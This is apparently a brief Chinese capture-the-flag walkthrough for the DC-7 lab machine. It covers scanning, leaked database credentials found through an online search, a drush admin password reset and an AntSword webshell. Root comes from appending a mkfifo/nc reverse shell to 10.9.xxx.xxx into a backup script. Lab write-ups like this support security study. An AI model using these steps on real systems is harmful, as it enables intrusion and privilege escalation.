DC-7

上線自帶ip

開啟目標網頁

nmap掃一下

檢視網站子目錄，沒有發現有用目錄

百度搜索@DC7USER

都看看，發現配置檔案中有伺服器的賬號密碼

獲得資料庫賬號密碼，試一下剛才掃出來的22埠能否登陸

    $使用者名稱= "dc7user";
    $密碼= " MdR3xOgB7#dW "; 
    $dbname = "Staff";
    $conn = mysqli_connect（$伺服器名， $使用者名稱， $密碼， $dbname);

成功登陸

檢視當前檔案，提示有一份新郵件在那個目錄：

巨長一篇， 翻譯看不懂，放棄

進入網站根目錄，修改網站管理員密碼

drush user-password admin --password=“123456”

嘗試登陸

找啊找

需要安裝php外掛才能識別

給伺服器安裝php外掛安裝成功後開始嘗試連線蟻劍

Python –c ‘import pty;pty.spawn(“/bin/bash”)’ 回顯

發現不是root，進行提權

將以下命令追加至/opt/scripts/backups.sh檔案中

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 10.9.xxx.xxx 1111>/tmp/f

等待很久，，，才能上線，root許可權